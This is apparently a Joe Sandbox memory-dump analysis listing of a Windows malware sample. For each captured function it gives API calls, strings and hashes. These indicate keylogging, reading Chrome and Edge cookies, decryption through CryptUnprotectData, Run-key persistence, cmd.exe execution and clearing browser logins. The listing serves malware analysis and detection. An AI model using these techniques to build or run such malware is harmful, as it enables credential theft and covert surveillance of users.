                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: ByteCharErrorFileLastMultiWideWrite
                    • String ID: PkGNG
                    • API String ID: 2456169464-263838557
                    • Opcode ID: f29f19b57bd44476b84c2158df793cbd226619e25f42890a5cb9caccfef44ccc
                    • Instruction ID: a4f89274a665815b2d7bd0a52cbb4c71b9b2878c435ac706d73e761117ab6cd9
                    • Opcode Fuzzy Hash: f29f19b57bd44476b84c2158df793cbd226619e25f42890a5cb9caccfef44ccc
                    • Instruction Fuzzy Hash: 18317271A002199FDB14DF59DC809EAB7B8EB48305F0444BEE90AD7260DB34ED80CBA4
                    APIs
                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                      • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041B99F
                      • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E74), ref: 0041857E
                      • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F,?,?,004040F5,00465E74), ref: 00418587
                      • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E
                    • Sleep.KERNEL32(000000FA,00465E74), ref: 00404138
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                    • String ID: /sort "Visit Time" /stext "$0NG
                    • API String ID: 368326130-3219657780
                    • Opcode ID: 074ad0252c5f85a0395eaa63b88ebd601cb6552471d06d252c91316da9998368
                    • Instruction ID: 62b88373b0174ac8ae4090b78ebfd0a8fca35ca34796720d8357018cc2c92f87
                    • Opcode Fuzzy Hash: 074ad0252c5f85a0395eaa63b88ebd601cb6552471d06d252c91316da9998368
                    • Instruction Fuzzy Hash: E9316271A0011956CB15FBA6D8969EE7375AB90308F40007FF206B71E2EF385D89CA99
                    APIs
                    • _wcslen.LIBCMT ref: 004162F5
                      • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                      • Part of subcall function 00413877: RegSetValueExA.ADVAPI32(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
                      • Part of subcall function 00413877: RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB
                      • Part of subcall function 00409DE4: _wcslen.LIBCMT ref: 00409DFD
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: _wcslen$CloseCreateValue
                    • String ID: !D@$okmode$PG
                    • API String ID: 3411444782-3370592832
                    • Opcode ID: 3229767f42b224c22e38ab05f87ced9dbd25ea478007aec8b0515c8cef1bdfe3
                    • Instruction ID: dff749dc984b923ba5de2327a6f3f9cc2e67bcaf748228c26ce3aec7d70e92d7
                    • Opcode Fuzzy Hash: 3229767f42b224c22e38ab05f87ced9dbd25ea478007aec8b0515c8cef1bdfe3
                    • Instruction Fuzzy Hash: 10119371B442011ADB187B72D832ABD22969F94358F80443FF54AAF2E2DEBD4C51525D
                    APIs
                      • Part of subcall function 0040C4C3: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C4F6
                    • PathFileExistsW.SHLWAPI(00000000), ref: 0040C61D
                    • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C688
                    Strings
                    • User Data\Default\Network\Cookies, xrefs: 0040C603
                    • User Data\Profile ?\Network\Cookies, xrefs: 0040C635
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExistsFilePath
                    • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                    • API String ID: 1174141254-1980882731
                    • Opcode ID: ec0199523fc237e56364718817167f2e0688e89b82cc13cff5a9b1f21d5ed8d2
                    • Instruction ID: e6b9b9a8142aca5ff9e4641a3ff80a721fb4b0471daa7637ae592fad8ebd6223
                    • Opcode Fuzzy Hash: ec0199523fc237e56364718817167f2e0688e89b82cc13cff5a9b1f21d5ed8d2
                    • Instruction Fuzzy Hash: B421037190011996CB14F7A2DC96CEEB738EE50319F40053FB502B31D2EF789A46C698
                    APIs
                      • Part of subcall function 0040C526: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C559
                    • PathFileExistsW.SHLWAPI(00000000), ref: 0040C6EC
                    • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C757
                    Strings
                    • User Data\Default\Network\Cookies, xrefs: 0040C6D2
                    • User Data\Profile ?\Network\Cookies, xrefs: 0040C704
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExistsFilePath
                    • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                    • API String ID: 1174141254-1980882731
                    • Opcode ID: 830e565da1f4430f56a3fad2b3585c60fae3d202001501423d8e3de01861922a
                    • Instruction ID: 83f6a23093d6b0727a30a1d550f3d6f5bdb2bb72864fa742cd8a9fd6423befd9
                    • Opcode Fuzzy Hash: 830e565da1f4430f56a3fad2b3585c60fae3d202001501423d8e3de01861922a
                    • Instruction Fuzzy Hash: AE21D37190011AD6CB05F7A2DC96CEEB778EE50719B50013FF502B31D2EF789A46C698
                    APIs
                    • CreateThread.KERNEL32(00000000,00000000,0040A27D,004750F0,00000000,00000000), ref: 0040A1FE
                    • CreateThread.KERNEL32(00000000,00000000,0040A267,004750F0,00000000,00000000), ref: 0040A20E
                    • CreateThread.KERNEL32(00000000,00000000,0040A289,004750F0,00000000,00000000), ref: 0040A21A
                      • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B172
                      • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateThread$LocalTimewsprintf
                    • String ID: Offline Keylogger Started
                    • API String ID: 465354869-4114347211
                    • Opcode ID: 739852a997fc0ae6182b294a28b4bb93c4a2cbea1e12e060c92b97aef043fd25
                    • Instruction ID: bcf1cfbdc14a627f6781ea3a40f7cea6448602225ce5b2be95dc640702f6c2bd
                    • Opcode Fuzzy Hash: 739852a997fc0ae6182b294a28b4bb93c4a2cbea1e12e060c92b97aef043fd25
                    • Instruction Fuzzy Hash: DE1194B12003187AD220B7369C86CBB765DDA8139CB00057FF946222D2EA795D54CAFB
                    APIs
                      • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B172
                      • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                    • CreateThread.KERNEL32(00000000,00000000,0040A267,?,00000000,00000000), ref: 0040AF6E
                    • CreateThread.KERNEL32(00000000,00000000,0040A289,?,00000000,00000000), ref: 0040AF7A
                    • CreateThread.KERNEL32(00000000,00000000,0040A295,?,00000000,00000000), ref: 0040AF86
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateThread$LocalTime$wsprintf
                    • String ID: Online Keylogger Started
                    • API String ID: 112202259-1258561607
                    • Opcode ID: be6d66d5fa79c5f31e74c778d4d5e15bc8bc5d5b3a82591b70bbeab99a5f0c5b
                    • Instruction ID: a86b307176fed80e65d2d8085b20e14cf0e56bf63d45b36b749a5edd9f3e52e0
                    • Opcode Fuzzy Hash: be6d66d5fa79c5f31e74c778d4d5e15bc8bc5d5b3a82591b70bbeab99a5f0c5b
                    • Instruction Fuzzy Hash: 1401C8A070031939E62076365C87D7F7A5DCA81398F40057FF645362C6D97D1C5586FB
                    APIs
                    • GetLocalTime.KERNEL32(00000000), ref: 0041B509
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: LocalTime
                    • String ID: | $%02i:%02i:%02i:%03i $PkGNG
                    • API String ID: 481472006-3277280411
                    • Opcode ID: cd8841d7ce7b31923eb0730a989a812e14017909399abac035ca2ef2887a575a
                    • Instruction ID: b0c371a91d376d28eb23a1cf2c2b6b2589463c7c7bf84255da33bc44f247512a
                    • Opcode Fuzzy Hash: cd8841d7ce7b31923eb0730a989a812e14017909399abac035ca2ef2887a575a
                    • Instruction Fuzzy Hash: 361181714082055AC304EB62D8419BFB3E9AB44348F50093FF895A21E1EF3CDA49C65A
                    APIs
                    • GetLocalTime.KERNEL32(?), ref: 00404F81
                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404FCD
                    • CreateThread.KERNEL32(00000000,00000000,00405150,?,00000000,00000000), ref: 00404FE0
                    Strings
                    • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: Create$EventLocalThreadTime
                    • String ID: KeepAlive | Enabled | Timeout:
                    • API String ID: 2532271599-1507639952
                    • Opcode ID: 7c8a9ce4b383af45d5410d66a549d3ab3812e2de270479e75a3fa2d1d41e82a0
                    • Instruction ID: 982fc92e7e47f2769c776e0d9ab1702947c5453eb715a4cfed9cf45540ca89dc
                    • Opcode Fuzzy Hash: 7c8a9ce4b383af45d5410d66a549d3ab3812e2de270479e75a3fa2d1d41e82a0
                    • Instruction Fuzzy Hash: A8110671904385AAC720A7778C0DEAB7FA8DBD2710F04046FF54163291DAB89445CBBA
                    APIs
                    • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData), ref: 00406A82
                    • GetProcAddress.KERNEL32(00000000), ref: 00406A89
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: CryptUnprotectData$crypt32
                    • API String ID: 2574300362-2380590389
                    • Opcode ID: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
                    • Instruction ID: d796ed41fc96dc9ef8d801536240fab0e9422483ab40f89d2a564a4d0f07de08
                    • Opcode Fuzzy Hash: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
                    • Instruction Fuzzy Hash: 6201B535B00216ABCB18DFAD9D449ABBBB8EB49300F14817EE95AE3341D674D9008BA4
                    APIs
                    • SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,10558B1C,10558B1C,PkGNG,0044C302,FF8BC369,00000000,00000002,00000000,PkGNG), ref: 0044C28C
                    • GetLastError.KERNEL32 ref: 0044C296
                    • __dosmaperr.LIBCMT ref: 0044C29D
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorFileLastPointer__dosmaperr
                    • String ID: PkGNG
                    • API String ID: 2336955059-263838557
                    • Opcode ID: 60eaf30ffa5a6b77e16cdf42a69bcf8f7fa5cf007f91ab5b57ca5c6e56bd7837
                    • Instruction ID: 03228b3a5a263cac3d3762c0c6cb9bea0ee6cefe7ee70a3785aa569069518732
                    • Opcode Fuzzy Hash: 60eaf30ffa5a6b77e16cdf42a69bcf8f7fa5cf007f91ab5b57ca5c6e56bd7837
                    • Instruction Fuzzy Hash: 9E016D32A11104BBDF008FE9CC4089E3719FB86320B28039AF810A7290EAB5DC118B64
                    APIs
                    • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                    • CloseHandle.KERNEL32(?), ref: 004051CA
                    • SetEvent.KERNEL32(?), ref: 004051D9
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseEventHandleObjectSingleWait
                    • String ID: Connection Timeout
                    • API String ID: 2055531096-499159329
                    • Opcode ID: 16c0c5432ea764d1c3b3677813c316a5f50629e206d56325c82df1a06a1f960a
                    • Instruction ID: e4880b57ed2806ada623013920947221b56867654f576af2420d72dde76e11cf
                    • Opcode Fuzzy Hash: 16c0c5432ea764d1c3b3677813c316a5f50629e206d56325c82df1a06a1f960a
                    • Instruction Fuzzy Hash: 1201D831A40F40AFE7257B368D9552BBBE0FF01302704097FE68396AE2D6789800CF59
                    APIs
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E833
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: Exception@8Throw
                    • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                    • API String ID: 2005118841-1866435925
                    • Opcode ID: 8dcc56bc0b3abd67e197b42ddab56c72444c781ea05e0f6efff8352e2a22a648
                    • Instruction ID: aca7d9cae529c24a85643cb8f0975e7fdd15ab88b82278639a3f13e82648cb6f
                    • Opcode Fuzzy Hash: 8dcc56bc0b3abd67e197b42ddab56c72444c781ea05e0f6efff8352e2a22a648
                    • Instruction Fuzzy Hash: 2C01B1315443086AE618F693C843FAA73585B10708F108C2FAA15761C2F67D6961C66B
                    APIs
                    • FormatMessageA.KERNEL32(00001100,00000000,00000000,00000400,?,00000000,00000000,00474EF8,00474EF8,PkGNG,00404A40), ref: 0041CB09
                    • LocalFree.KERNEL32(?,?), ref: 0041CB2F
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: FormatFreeLocalMessage
                    • String ID: @J@$PkGNG
                    • API String ID: 1427518018-1416487119
                    • Opcode ID: 582a0a935ffae84e33b405a2c8e80a835bcb557197e1ba62297b84e69e8a9d31
                    • Instruction ID: 02a9d8e2c753fe243ccbc909122ce1ddd8f8b45a09ed5088e6b723b988b0f700
                    • Opcode Fuzzy Hash: 582a0a935ffae84e33b405a2c8e80a835bcb557197e1ba62297b84e69e8a9d31
                    • Instruction Fuzzy Hash: 5EF0A434B0021AAADF08A7A6DD4ADFF7769DB84305B10007FB606B21D1EEB86D05D659
                    APIs
                    • RegCreateKeyW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,?), ref: 0041381F
                    • RegSetValueExW.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,?,?,?,?,00000000,004752D8,759237E0,?), ref: 0041384D
                    • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,004752D8,759237E0,?,?,?,?,?,0040CFAA,?,00000000), ref: 00413858
                    Strings
                    • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0041381D
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseCreateValue
                    • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                    • API String ID: 1818849710-1051519024
                    • Opcode ID: 3da2de30dd2e4c2ff773a1c969aacac889c14d245fa7b83563a43fe4ea506f1b
                    • Instruction ID: 91b44a8789fefabe47d0aed0b401f4e945a8dec35bb1902c17c37083bf943f80
                    • Opcode Fuzzy Hash: 3da2de30dd2e4c2ff773a1c969aacac889c14d245fa7b83563a43fe4ea506f1b
                    • Instruction Fuzzy Hash: 83F0C271440218FBDF10AFA1EC45FEE376CEF00B56F10452AF905A61A1E7359F04DA94
                    APIs
                    • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFB1
                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040DFF0
                      • Part of subcall function 00435640: _Yarn.LIBCPMT ref: 0043565F
                      • Part of subcall function 00435640: _Yarn.LIBCPMT ref: 00435683
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E016
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                    • String ID: bad locale name
                    • API String ID: 3628047217-1405518554
                    • Opcode ID: 03a3a1b6538e95a80bbc96a5a3230d3fb174e533ca0510e3d942a7448ac3be7a
                    • Instruction ID: c9d4814c50014869750c7e26a4e1a69426a580a77e14145940ab7c7d7e24a8db
                    • Opcode Fuzzy Hash: 03a3a1b6538e95a80bbc96a5a3230d3fb174e533ca0510e3d942a7448ac3be7a
                    • Instruction Fuzzy Hash: EAF081314006049AC634FA62D863B9AB7B89F14718F504A7FB906228D1EF7CBA1CCA4C
                    APIs
                    • RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,0046611C), ref: 0041377E
                    • RegSetValueExA.ADVAPI32(0046611C,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041CAB1,WallpaperStyle,0046611C,00000001,00474EE0,00000000), ref: 004137A6
                    • RegCloseKey.ADVAPI32(0046611C,?,?,0041CAB1,WallpaperStyle,0046611C,00000001,00474EE0,00000000,?,0040875D,00000001), ref: 004137B1
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseCreateValue
                    • String ID: Control Panel\Desktop
                    • API String ID: 1818849710-27424756
                    • Opcode ID: 6030d9855dac89f4cd46f7f8c789974497344dcf9873e73d86c3d4cdefa30cde
                    • Instruction ID: c04290829ccef693e4e8b5b7d06cdf9a2950efbbd707a4c1379ff92f90edcb59
                    • Opcode Fuzzy Hash: 6030d9855dac89f4cd46f7f8c789974497344dcf9873e73d86c3d4cdefa30cde
                    • Instruction Fuzzy Hash: B8F06272400118FBCB009FA1DD45DEA376CEF04B51F108566FD09A61A1D7359E14DB54
                    APIs
                    • CreateThread.KERNEL32(00000000,00000000,Function_0001D45D,00000000,00000000,00000000), ref: 00416C47
                    • ShowWindow.USER32(00000009), ref: 00416C61
                    • SetForegroundWindow.USER32 ref: 00416C6D
                      • Part of subcall function 0041CD9B: AllocConsole.KERNEL32(00475338), ref: 0041CDA4
                      • Part of subcall function 0041CD9B: ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
                      • Part of subcall function 0041CD9B: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: Window$ConsoleShow$AllocCreateForegroundOutputThread
                    • String ID: !D@
                    • API String ID: 3446828153-604454484
                    • Opcode ID: 6979cefb1d1fefa54efaa96eb459276fcc124e6eae3c34ad0f1a5970b9474eaa
                    • Instruction ID: c1d0571eb829819ca76672189d51ce116019f2d3a91c4b5ec781e9fa27a10d2f
                    • Opcode Fuzzy Hash: 6979cefb1d1fefa54efaa96eb459276fcc124e6eae3c34ad0f1a5970b9474eaa
                    • Instruction Fuzzy Hash: 9EF05E70158201EAD720AB62EC45AFA7B69EB54351F00483BF849D14F2DB398C85C69D
                    APIs
                    • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 00416130
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExecuteShell
                    • String ID: /C $cmd.exe$open
                    • API String ID: 587946157-3896048727
                    • Opcode ID: 1fb54d341f42364606467e993f20cb3c4ceaa424224daa94047b07daa39982c0
                    • Instruction ID: 0a18f3537a1213b4b5dca9b82f73c842755a7e35c30cee8a650de64661b344da
                    • Opcode Fuzzy Hash: 1fb54d341f42364606467e993f20cb3c4ceaa424224daa94047b07daa39982c0
                    • Instruction Fuzzy Hash: 0DE0C0B0208345AAC705E775CC95CBF73ADAA94749B50483F7142A20E2EF7C9D49C659
                    APIs
                    • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
                    • GetProcAddress.KERNEL32(00000000), ref: 0040141B
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressHandleModuleProc
                    • String ID: GetCursorInfo$User32.dll
                    • API String ID: 1646373207-2714051624
                    • Opcode ID: 0feee19109755bbb7e48939f97e78712d63acfb534ae43d0cb60b2001d0c131e
                    • Instruction ID: 65f79b4a2c2aed896b4012a4b0ac893fb7d0ccba54e760513c8834f3bef68171
                    • Opcode Fuzzy Hash: 0feee19109755bbb7e48939f97e78712d63acfb534ae43d0cb60b2001d0c131e
                    • Instruction Fuzzy Hash: B4B09B70541740E7CB106BF45C4F9153555B514703B105476B44996151D7B44400C61E
                    APIs
                    • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014B9
                    • GetProcAddress.KERNEL32(00000000), ref: 004014C0
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: GetLastInputInfo$User32.dll
                    • API String ID: 2574300362-1519888992
                    • Opcode ID: 6185ad33e38da01c5cedd7fab51ef37947c258832bc82ab0b36b916a7b459740
                    • Instruction ID: ea73ef4d1088e939c140d9431744cb36a9dcab52d5ea7f3e4bb33043e5d41cbe
                    • Opcode Fuzzy Hash: 6185ad33e38da01c5cedd7fab51ef37947c258832bc82ab0b36b916a7b459740
                    • Instruction Fuzzy Hash: 5EB092B45C1700FBCB106FA4AC4E9293AA9A614703B1088ABB845D2162EBB884008F9F
                    APIs
                    Strings
                    • [Cleared browsers logins and cookies.], xrefs: 0040C0E4
                    • Cleared browsers logins and cookies., xrefs: 0040C0F5
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: Sleep
                    • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                    • API String ID: 3472027048-1236744412
                    • Opcode ID: 24f20f3b92deb628025467620478f708c177420abe32db4e4f6f8a7850cc6954
                    • Instruction ID: fac43f66edf0589ccdcbb227709f1a337e776f7542e83b73a027453bfa593f46
                    • Opcode Fuzzy Hash: 24f20f3b92deb628025467620478f708c177420abe32db4e4f6f8a7850cc6954
                    • Instruction Fuzzy Hash: 2531C804348380E9D6116BF554567AB7B814E93744F08457FB9C42B3D3D97E4848C7AF
                    APIs
                      • Part of subcall function 0041C551: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041C561
                      • Part of subcall function 0041C551: GetWindowTextLengthW.USER32(00000000), ref: 0041C56A
                      • Part of subcall function 0041C551: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041C594
                    • Sleep.KERNEL32(000001F4), ref: 0040A573
                    • Sleep.KERNEL32(00000064), ref: 0040A5FD
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: Window$SleepText$ForegroundLength
                    • String ID: [ $ ]
                    • API String ID: 3309952895-93608704
                    • Opcode ID: 4603c95d7a0278816d05f17b1e103e1b56ebf32c1baad14edcc254fcbbfd146b
                    • Instruction ID: 97bd403738d1ca0cb59e80c1fc79ee6201ed0cb329172f4776a94889a39aca56
                    • Opcode Fuzzy Hash: 4603c95d7a0278816d05f17b1e103e1b56ebf32c1baad14edcc254fcbbfd146b
                    • Instruction Fuzzy Hash: FE119F315043006BC614BB65CC5399F77A8AF50308F40053FF552665E2FF79AA5886DB
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 26aae147e3b4032e8d822610677c8b44980169b964e3a1f9465f38b9cd56633c
                    • Instruction ID: 17f232e73e96fb976a24982deb7d35e81c220cd9520ca4ef7e8dcf180de91df6
                    • Opcode Fuzzy Hash: 26aae147e3b4032e8d822610677c8b44980169b964e3a1f9465f38b9cd56633c
                    • Instruction Fuzzy Hash: 1301F2B36497067EFA202E786CC1F67220CDF41BBEB34032BB574712D1DA68CE404568
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 544fafb264448ea5c1072d449201ab24ccf485d51590c339dd7f80fdded84d3d
                    • Instruction ID: 34d970f17befced98e3ca294e9c9a609e5e7bfbb0444a55afbb34e25ce639c56
                    • Opcode Fuzzy Hash: 544fafb264448ea5c1072d449201ab24ccf485d51590c339dd7f80fdded84d3d
                    • Instruction Fuzzy Hash: 0601A2B26096117EFA111E796CC4E27624CDB81BBF325032BF535612D6DA688E014169
                    APIs
                    • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E
                    • GetFileSize.KERNEL32(00000000,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C4B2
